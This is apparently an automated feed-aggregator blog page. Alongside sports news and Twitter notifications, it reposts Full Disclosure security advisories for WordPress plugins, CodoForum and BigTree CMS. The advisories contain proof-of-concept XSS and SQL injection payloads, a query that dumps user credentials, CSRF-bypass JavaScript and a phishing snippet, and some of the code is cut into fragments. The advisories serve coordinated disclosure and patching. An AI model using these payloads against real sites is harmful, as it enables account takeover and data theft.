from FOX Sports Digital http://ift.tt/1L5sZMG
via IFTTT
Footballer treated for cancer wins case over stopped pay
LAUSANNE, Switzerland (AP) The Court of Arbitration for Sport has awarded ''moral damages'' of around $60,000 to a football player whose contract was suspended while he was treated for cancer.
from FOX Sports Digital http://ift.tt/1MjCl5W
via IFTTT
from FOX Sports Digital http://ift.tt/1MjCl5W
via IFTTT
I have a new follower on Twitter
Zach Alfaro
Online marketer's have very busy lives. I'll help you lead a more productive, successful & happy lifestyle through science-backed research & psychological hacks
Australia
http://t.co/GJPRvVxGDX
Following: 3503 - Followers: 3424
August 12, 2015 at 05:47AM via Twitter http://twitter.com/Kaizen_Creative
Contact Us
This is the official web site of Chicago Area Alcoholics Anonymous. Graphic ... Anonymous and Alcoholics Anonymous World Services, Inc. www.aa.org.
from Google Alert - anonymous http://ift.tt/1L4YOlW
via IFTTT
from Google Alert - anonymous http://ift.tt/1L4YOlW
via IFTTT
Harald Nielsen, who scored 6 at 1960 Olympics, dies at 73
COPENHAGEN, Denmark (AP) Harald Nielsen, a Denmark center forward known as ''Gold Harald'' after scoring six goals at the 1960 Rome Olympics, has died. He was 73.
from FOX Sports Digital http://ift.tt/1WhX0MA
via IFTTT
from FOX Sports Digital http://ift.tt/1WhX0MA
via IFTTT
ADO goalkeeper turns goal poacher with back heel vs PSV
THE HAGUE, Netherlands (AP) With his team losing 2-1 in the dying seconds of its Eredivisie opener against PSV Eindhoven, ADO The Hague goalkeeper Martin Hansen decided to cause a bit of havoc in PSV's penalty area.
from FOX Sports Digital http://ift.tt/1IYjB6D
via IFTTT
from FOX Sports Digital http://ift.tt/1IYjB6D
via IFTTT
Download Free Windows 10 for the Internet of Things and Raspberry Pi 2
In the month of February 2015, second generation Raspberry Pi was made available and was commonly known as Raspberry Pi 2. Buzz was that Windows 10 will be supporting the hardware for its compatibility with the smart objects, popularly known as the ‘Internet of Things’. So, finally the Free version of Windows 10 for Raspberry Pi 2 is here. On Monday, public release of Microsoft’s
from The Hacker News http://ift.tt/1P61nF3
via IFTTT
from The Hacker News http://ift.tt/1P61nF3
via IFTTT
I have a new follower on Twitter
Ted Clark
Data Guy #BigData #SQLServer #datablending #crossfit #crossfitkids @sonicxfitkids #seeyouatsonic http://t.co/54s59LdQOn
#seattle #wallingford
http://t.co/1OZlLz5z6O
Following: 3672 - Followers: 3738
August 12, 2015 at 05:01AM via Twitter http://twitter.com/tedclark
Susie (@henson40) retweeted your Tweet!
@mistermcguire: [FD] Stored XSS in Google Analytics by Yoast Premium allows privileged users to attack other users (WordPress plug… Susie retweeted your Tweet. View Patrick McGuire @mistermcguire = [FD] Stored XSS in Google Analytics by Yoast Premium allows privileged users to attack other users (WordPress plug… ift.tt/1f76nN7 Settings | Help | Opt-out | Download app Twitter, Inc. 1355 Market Street, Suite 900 San Francisco, CA 94103
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
Microsoft issues Security Patches for Windows 10 and Edge Browser
Updated your PCs to Windows 10? Now it’s time to patch your Windows 10 software. Microsoft has issued its monthly Patch Tuesday by releasing 14 security bulletins, nearly half of it address vulnerabilities in its latest operating system, Windows 10. Four of them are marked critical, affecting Windows, .Net Framework, Microsoft Office, Microsoft Lync, Internet Explorer, Microsoft
from The Hacker News http://ift.tt/1IFA5nh
via IFTTT
from The Hacker News http://ift.tt/1IFA5nh
via IFTTT
[FD] Stored XSS in iframe allows less privileged users to do almost anything an admin can (WordPress plugin)
Details ================ Software: iframe Version: 3.0 Homepage: http://ift.tt/1hVBaYb Advisory report: http://ift.tt/1N3PiSc CVE: Awaiting assignment CVSS: 5.5 (Medium; AV:N/AC:L/Au:S/C:P/I:P/A:N) Description ================ Stored XSS in iframe allows less privileged users to do almost anything an admin can Vulnerability ================ Users without the unfiltered_html capability are able to insert arbitrary HTML into pages and thus exceed the privileges they were granted. Proof of concept ================ Insert the following into a post: [iframe src=\"http://www.youtube.com/embed/4qsGTXLnmKs\" width=\"100%\" height=\"500\" onload=\"alert(1)\"] Mitigations ================ Disable the plugin until a new version is released that fixes this bug. The vendor has released version 4.0 in which onload is disabled, but the other ‘event’ attributes are still permitted, including onpageshow. A number of these event attributes could be used to execute this attack, so this issue is not resolved. Disclosure policy ================ dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: http://ift.tt/1B6NWzd Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report with 14 days. Timeline ================ 2015-07-31: Discovered 2015-08-05: Reported to vendor via web form on http://ift.tt/1GJ8SBg 2015-08-06: Vendor responded 2015-08-10: Vendor reported fixed in version 4.0 but this does not address the issue: the plugin is still vulnerable. 2015-08-10: Published Discovered by dxw: ================ Tom Adams Please visit security.dxw.com for more information.
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] Reflected XSS in iframe allows unauthenticated users to do almost anything an admin can (WordPress plugin)
Details ================ Software: iframe Version: 3.0 Homepage: http://ift.tt/1hVBaYb Advisory report: http://ift.tt/1N3PiSh CVE: Awaiting assignment CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N) Description ================ Reflected XSS in iframe allows unauthenticated users to do almost anything an admin can Vulnerability ================ If the “get_params_from_url” option is used in the iframe shortcode, the page/post it’s on is opened up to a reflected XSS attack. Proof of concept ================ Paste the following into a post: [iframe src=\"http://www.youtube.com/embed/4qsGTXLnmKs\" width=\"100%\" height=\"500\" get_params_from_url=\"1\"] Visit the post in a browser that doesn’t attempt to mitigate XSS attacks (i.e. Firefox) and add some extra parameters: http://localhost/2015/07/31/iframe/?a=%22%3E%3C/iframe%3E%3Cscript%3Ealert(`hello%20world`)%3C/script%3E Mitigations ================ Upgrade to version 4.0 or later If this is not possible, ensure that the ‘get_params_from_url’ argument is never used in the shortcode. Disclosure policy ================ dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: http://ift.tt/1B6NWzd Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report with 14 days. Timeline ================ 2015-07-31: Discovered 2015-08-05: Reported to vendor via web form on http://ift.tt/1GJ8SBg 2015-08-06: Vendor responded 2015-08-10: Vendor reported fixed in version 4.0 2015-08-10: Published Discovered by dxw: ================ Tom Adams Please visit security.dxw.com for more information.
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] Blind SQL Injection in WP Symposium allows unauthenticated attackers to access sensitive data (WordPress plugin)
Details ================ Software: WP Symposium Version: 15.1 Homepage: http://ift.tt/1TolapK Advisory report: http://ift.tt/1UCda1p CVE: Awaiting assignment CVSS: 6.4 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:P) Description ================ Blind SQL Injection in WP Symposium allows unauthenticated attackers to access sensitive data Vulnerability ================ An unauthenticated user can run blind sql injection of the site and extract password hashes and other information from the database. Proof of concept ================ Perform the following POST to a site with the plugin installed. The request will take over 5 seconds to respond: POST /wordpress/wp-content/plugins/wp-symposium/ajax/forum_functions.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://ift.tt/1vzc6T2 Content-Length: 51 Cookie: wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; wp-settings-time-1=1421717320 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache action=getTopic&topic_id=1 AND SLEEP(5)&group_id=0 Mitigations ================ Upgrade to version 15.8 or later Disclosure policy ================ dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: http://ift.tt/1B6NWzd Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report with 14 days. Timeline ================ 2015-03-02: Discovered 2015-07-14: Reported to simon@wpsymposium.com 2015-07-14: Requested CVE 2015-08-07: Vendor confirmed fixed in version 15.8 2015-08-10: Published Discovered by dxw: ================ Glyn Wintle Please visit security.dxw.com for more information.
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] Stored XSS in Google Analytics by Yoast Premium allows privileged users to attack other users (WordPress plugin)
Details ================ Software: Google Analytics by Yoast Premium Version: 5.4.4 Homepage: http://ift.tt/1ked3Xn Advisory report: http://ift.tt/1N9k0t9 CVE: Awaiting assignment CVSS: 5.5 (Medium; AV:N/AC:L/Au:S/C:P/I:P/A:N) Description ================ Stored XSS in Google Analytics by Yoast Premium allows privileged users to attack other users Vulnerability ================ A user with the “manage_options” capability but not the “unfiltered_html” capability is able to add arbitrary JavaScript to a page visible to admins. In the default configuration of WordPress, all users with the “manage_options” capability have the “unfiltered_html” capability. However it is possible to remove the “unfiltered_html” capability from (non-super) admin users. Therefore this presents a vulnerability in which an authenticated user is able to exceed their privileges. Proof of concept ================ Remove the “unfiltered_html” capability from the admin role and log in as a non-super admin For testing you can remove that capability from all users with this line: add_filter(‘user_has_cap‘, function ($allcaps, $cap, $args) { $allcaps[‘unfiltered_html‘] = false; return $allcaps; }, 10, 3); Visit Analytics > Settings Click the Advanced tab Enter the following into the Subdomain tracking field (including the quotes): ” onfocus=”alert(1) Click Save changes Refresh the page Click the Advanced tab Focus the Subdomain tracking field by clicking it or tabbing to it alert(1) will be called Mitigations ================ Upgrade to version 5.4.5 or later. If all users have the ‘unfiltered_html’ capability, or there is only one admin, then there is no issue. Disclosure policy ================ dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: http://ift.tt/1B6NWzd Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report with 14 days. Timeline ================ 2015-07-21: Discovered 2015-07-22: Reported to vendor via email 2015-07-22: Requested CVE 2015-07-10: Vendor confirmed fixed in version 5.4.5 2015-07-10: Published Discovered by dxw: ================ Tom Adams Please visit security.dxw.com for more information.
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] CodoForum 3.3.1 Multiple SQL Injections
CodoForum 3.3.1: Multiple SQL Injection Vulnerabilities Security Advisory – Curesec Research Team http://ift.tt/1h1K2mb 1. Introduction Affected Product: CodoForum 3.3.1 Fixed in: 3.4 Fixed Version Link: http://ift.tt/1h1K2m5 Vendor Contact: admin@codologic.com Vulnerability Type: Multiple SQL injections Remote Exploitable: Yes Reported to vendor: 07/07/2015 Disclosed to public: 08/07/2015 Release mode: Coordinated CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description There are two SQL injections in the CodoForum application. One is a blind injection which does not require any credentials, the other is a normal SQL injection which does require that the attacker be authenticated. These vulnerabilities can lead to data leaks as well as compromisation of the host. SQL Injection 1 (Blind) The script that parses the request URL and displays posts depending on the retrieved id does not use proper protection against SQL injections. It does cast the retrieved user input to int, but it does not use this value, but the original value instead. The retrieved values are never displayed to the end user, making this a blind injection. An attacker does not need to be authenticated to perform this attack. Proof of Concept: http://localhost/codoforum/index.php?u=/page/6 and 1=1%23/terms-of-service -> true (terms and services displayed) http://localhost/codoforum/index.php?u=/page/6 and 1=2%23/terms-of-service -> false ("You do not have enough permissions to view this page!") Code: routes.php:593 $pid = (int) $id; $user = \CODOF\User\User::get(); $qry = 'SELECT title, content FROM ' . PREFIX . 'codo_pages p ' . ' LEFT JOIN ' . PREFIX . 'codo_page_roles r ON r.pid=p.id ' . ' WHERE (r.rid IS NULL OR (r.rid IS NOT NULL AND r.rid IN (' . implode($user->rids) . ')))' . ' AND p.id=' . $id; SQL Injection 2 The script processing the mass sending of email does not properly handle the subject, body, or roles arguments it retrieves from a POST request. The script can only be accessed by authenticated users. The following request: http://localhost/codoforum/admin/index.php?page=system/massmail POST: subject=USER_SUPPLIED_subj&body=USER_SUPPLIED_body for example results in this query: INSERT INTO codo_mail_queue (to_address, mail_subject, body) SELECT mail, 'USER_SUPPLIED_subj', 'USER_SUPPLIED_body' FROM codo_users AS u Code: admin/modules/system/massmail.php $subject = html_entity_decode($_POST['subject'], ENT_NOQUOTES, "UTF-8"); $body = html_entity_decode($_POST['body'], ENT_NOQUOTES, "UTF-8"); [...] if (isset($_POST['roles'])) { $condition = " INNER JOIN " . PREFIX . "codo_user_roles AS r ON r.uid=u.id " . " WHERE r.rid IN (" . implode($_POST['roles']) . ")"; } $qry = "INSERT INTO " . PREFIX . "codo_mail_queue (to_address, mail_subject, body)" . " SELECT mail, '$subject', '$body' FROM " . PREFIX . "codo_users AS u" . $condition; 3. Solution Upgrade to Version 3.4: http://ift.tt/1h1K2m5 4. Report Timeline 07/07/2015 Informed Vendor about Issue 07/07/2015 Vendor confirmation 08/03/2015 Vendor releases Version 3.4 08/07/2015 Disclosed to public
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] CodoForum 3.3.1 Multiple Cross Site Scriptings
CodoForum 3.3.1 Multiple Cross Site Scriptings Security Advisory – Curesec Research Team Online-Reference http://ift.tt/1Emr7Y8 1. Introduction Affected Product: CodoForum 3.3.1 Fixed in: 3.4 Fixed Version Link: http://ift.tt/1h1K2m5 Vendor Contact: admin@codologic.com Vulnerability Type: Multiple Reflected XSS Remote Exploitable: Yes Reported to vendor: 07/07/2015 Disclosed to public: 08/07/2015 Release mode: Coordinated CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description Various components of CodoForum are vulnerable to cross site scripting. With this, it is possible to inject and execute arbitrary JavaScript code. This can for example be used by an attacker to inject a JavaScript keylogger, bypass CSRF protection, or perform phishing attacks. The attacks can be exploited by getting the victim to click a link or visit an attacker controlled website. XSS 1 CodoForum uses version 2.1.2 of HybridAuth, which has an XSS vulnerability in the installation script. This vulnerability is not present in current versions of HybridAuth. Sample POC: http://localhost/codoforum/sys/Ext/hybridauth/install.php/">Code: sys/Ext/hybridauth/install.php:316
Source: Gmail -> IFTTT-> Blogger
- sys/Ext/hybridauth/install.php:346 if( isset( $item["callback"] ) && $item["callback"] ){ $provider_callback_url = '' . $GLOBAL_HYBRID_AUTH_URL_BASE . '?hauth.done=' . $provider . ''; } XSS 2, 3 & 4 The page that manages users does not encode user input before echoing it, and is thus open to XSS. The vulnerable parameters are "username", "role", as well as "status". As the function retrieving POST request parameters uses GET parameters as fallback, it is possible to exploit this issue via POST or GET request. Sample POC: http://localhost/codoforum/admin/index.php?page=users&username=">&role=2&status=99 http://localhost/codoforum/admin/index.php?page=users&username=foo&role=2">&status=99 http://localhost/codoforum/admin/index.php?page=users&username=foo&role=2&status=9"> Code: // admin/modules/users.php:261 $role = getPost('role', '0'); $smarty->assign('role_selected', (($role == '0') ? '2' : $role)); [...] $filter_url.="&role=" . $role; [...] $status = getPost('status', 99); $smarty->assign('status_selected', $status); [...] $filter_url.="&status=" . $status; [...] $username = getPost('username', ""); $smarty->assign('entered_username', $username); [...] $filter_url.="&username=" . $username; XSS 5 The page that shows a list of users does not encode the "pno" argument, and is thus open to XSS. Sample POC: http://localhost/codoforum/admin/index.php?page=users&sort_order=DESC&pno=1">&sort_by=status Code: admin/modules/users.php:326 $sort_url = "index.php?page=users&sort_order=" . $isor . $filter_url . '&pno=' . $_GET['pno']; //put inverted link only for table heading $smarty->assign('sort_url', $sort_url); XSS 6 The page that shows plugins does not properly encode the "plugin" argument, and is thus open to XSS. Sample POC: http://localhost/codoforum/admin/index.php?page=ploader&plugin= Code: admin/modules/ploader.php:85
- '.$_GET['plugin'].'
- 3. Proof of Concept Codes: This proof of concept adds a new user by bypassing CSRF protection. In a similar way, the new user could be given admin rights. The script can be loaded from an external server by injecting as payload for the XSS vulnerabilities described above. var csrfProtectedPage = 'http://localhost/codoforum/admin/index.php?page=users'; // get valid token for current request var html = get(csrfProtectedPage); document.body.innerHTML = html; var form = document.getElementById('add_user_form'); var token = form.CSRF_token.value; // build form with valid token document.body.innerHTML += '
Source: Gmail -> IFTTT-> Blogger
[FD] BigTree CMS 4.2.3 Multiple Sql Injections
BigTree CMS 4.2.3: Multiple SQL Injection Vulnerabilities Security Advisory – Curesec Research Team Online-Reference: http://ift.tt/1h1JZH9 1. Introduction Affected Product: BigTree CMS 4.2.3 Fixed in: 4.2.4 Fixed Version Link: http://ift.tt/1h1JZH1 Vendor Contact: contribute@bigtreecms.org Vulnerability Type: Multiple SQL Injections Remote Exploitable: Yes Reported to vendor: 07/07/2015 Disclosed to public: 08/07/2015 Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description Various components of the admin area of the BigTree CMS are vulnerable to SQL injection, which can lead to data leaks as well as compromisation of the host. Please note that you have to be authenticated to exploit this issue. SQL Injection 1 The script that processes page view requests passes the "id" GET request value to functions which put this value directly into SQL queries. No prepared statements or escaping is used, thus opening it up to SQL injection. Proof of Concept (Show all BigTree users): http://localhost//BigTree-CMS/site/index.php/admin/pages/view-tree/0' union all select 1,concat(email, ":", password),3,4,5,6,7,8,9,10 from bigtree_users %23/ Code: core/admin/modules/pages/view-tree.php:151; page id is user controlled $nav_visible = array_merge($admin->getNaturalNavigationByParent($page["id"],1),$admin->getPendingNavigationByParent($page["id"])); $nav_hidden = array_merge($admin->getHiddenNavigationByParent($page["id"]),$admin->getPendingNavigationByParent($page["id"],"")); $nav_archived = $admin->getArchivedNavigationByParent($page["id"]); core/inc/bigtree/admin.php:2638 static function getArchivedNavigationByParent($parent) { [...] $q = sqlquery("SELECT id,nav_title as title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views FROM bigtree_pages WHERE parent = '$parent' AND archived = 'on' ORDER BY nav_title asc"); core/inc/bigtree/admin.php:3167 static function getHiddenNavigationByParent($parent) { [...] $q = sqlquery("SELECT id,nav_title as title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views FROM bigtree_pages WHERE parent = '$parent' AND in_nav = '' AND archived != 'on' ORDER BY nav_title asc"); core/inc/bigtree/admin.php:3758 static function getNaturalNavigationByParent($parent,$levels = 1) { [...] $q = sqlquery("SELECT id,nav_title AS title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views FROM bigtree_pages WHERE parent = '$parent' AND in_nav = 'on' AND archived != 'on' ORDER BY position DESC, id ASC"); core/inc/bigtree/admin.php:4531 static function getPendingNavigationByParent($parent,$in_nav = true) { [...] $q = sqlquery("SELECT * FROM bigtree_pending_changes WHERE pending_page_parent = '$parent' AND `table` = 'bigtree_pages' AND type = 'NEW' ORDER BY date DESC"); SQL Injection 2 When creating a new user, the email address is not checked server side, so it is possible to set it to anything. When logging in, the email address is saved in the session, and later used to retrieve user data. This happens without prepared statements, thus opening the query up to SQL injection. Proof of Concept: 1. Create User f'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10%23bar@example.com 2. Log in 3. result can be seen in multiple places Code: core/inc/bigtree/admin.php:81 $f = sqlfetch(sqlquery("SELECT * FROM bigtree_users WHERE id = '".$_SESSION["bigtree_admin"]["id"]."' AND email = '".$_SESSION["bigtree_admin"]["email"]."'")); SQL Injection 3 (Blind) The function used to calculate the SEO score of a post for Ajax requests passes unsanitized user input to a function performing the actual computation. This function does not use prepared statements, thus opening it up to SQL injection. The result of the query is never echoed to the end user, making this a blind SQL injection. Proof of Concept: http://localhost//BigTree-CMS/site/index.php/admin/ajax/pages/get-seo-score POST: content=foo&resources=bar&id=foo' or 1=2%23&title=Trees of All Sizes http://localhost//BigTree-CMS/site/index.php/admin/ajax/pages/get-seo-score POST: content=foo&resources=bar&id=foo' or 1=1%23&title=Trees of All Sizes Code: core/admin/ajax/pages/get-seo-score.php:4: $seo = $admin->getPageSEORating($_POST,$_POST["resources"]); core/inc/bigtree/admin.php:4222 static function getPageSEORating($page,$content) { [...] if ($page["title"]) { $score += 5; // They have a title, let's see if it's unique $r = sqlrows(sqlquery("SELECT * FROM bigtree_pages WHERE title = '".sqlescape($page["title"])."' AND id != '".$page["id"]."'")); 3. Solution To mitigate this issue please upgrade at least to version 4.2.3: http://ift.tt/1h1JZH1 Please note that a newer version might already be available. 4. Report Timeline 07/07/2015 Informed Vendor about Issue 07/08/2015 Vendor send Fixes for confirmation 07/10/2015 Fixes Confirmed 07/26/2015 Vendor releases Version 4.2.3 08/07/2015 Disclosed to public
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] BigTree CMS 4.2.3 Multiple Cross-Site-Scripting Vulnerabilities
BigTree CMS 4.2.3: Multiple Cross Site Scripting Vulnerabilities Security Advisory – Curesec Research Team Online Reference: http://ift.tt/1Emr924 1. Introduction Affected Product: BigTree CMS 4.2.3 Fixed in: 4.2.4 Fixed Version Link: http://ift.tt/1h1JZH1 Vendor Contact: contribute@bigtreecms.org Vulnerability Type: Multiple Reflected XSS Remote Exploitable: Yes Reported to vendor: 07/07/2015 Disclosed to public: 08/07/2015 Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description Various components of the BigTree CMS are vulnerable to cross site scripting. With this, it is possible to inject and execute arbitrary JavaScript code. This can for example be used by an attacker to inject a JavaScript keylogger or perform phishing attacks. Please find attached three XSS attacks exploitable via GET, and one exploitable via POST requests. The attacks using GET requests can be exploited by getting the victim to click a link or visit an attacker controlled website. The attack using a POST request requires the victim to visit an attacker controlled website. XSS 1 (via POST) The script that processes Ajax requests for the file browser does not properly sanitize the "file" parameter, opening it up to reflected XSS. Sample POC:
Payload to load a remote script: ">Code: core/admin/ajax/developer/extensions/file-browser.php:127:
Source: Gmail -> IFTTT-> Blogger
core/admin/modules/pages/_properties.php:70 core/admin/layouts/default.php:153 / " XSS 4 (via GET) The "id" value described in the previous section is additionally echoed inside script tags, opening it up to a further XSS injection. Limitations: forward slash cannot be used and single and double quotes are escaped. Simple POC: http://localhost/BigTree-CMS/site/index.php/admin/pages/view-tree/xsstest", }});}});alert(1);$("%23pages_pages").sortable({ axis: "y", containment: "parent", handle: ".icon_sort", items: "li", placeholder: "ui-sortable-placeholder", tolerance: "pointer", update: function() {$.ajax("", { type: "POST", data: { id: " Code: core/admin/modules/pages/_nav-tree.php:138 3. Proof of Concept Codes: 3.1 Example Phishing Site: The attack can for example be used for phishing, by displaying the login page and sending the data submitted by the victim to an attacker controlled server. var payload = document.createElement('div'); payload.innerHTML = " "; document.replaceChild(payload, document.documentElement); 4. Solution To mitigate this issue please upgrade at least to version 4.2.3: http://ift.tt/1h1JZH1 Please note that a newer version might already be available. 5. Report Timeline 07/07/2015 Informed Vendor about Issue 07/08/2015 Vendor send Fixes for confirmation 07/10/2015 Fixes Confirmed 07/26/2015 Vendor releases Version 4.2.3 08/07/2015 Disclosed to public
Source: Gmail -> IFTTT-> Blogger
Subscribe to:
Posts (Atom)